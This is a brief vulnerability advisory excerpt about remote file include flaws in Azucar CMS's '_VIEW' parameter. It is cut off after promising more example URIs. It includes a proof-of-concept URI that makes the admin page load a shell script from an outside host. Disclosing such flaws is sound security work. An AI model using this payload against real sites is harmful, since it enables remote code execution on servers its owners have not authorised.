|
Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URI is available: http://www.example.com/admin/index_sitios.php?_VIEW=http://www.example2.com/shell.php The following example URIs are available: |
|
Privacy Statement |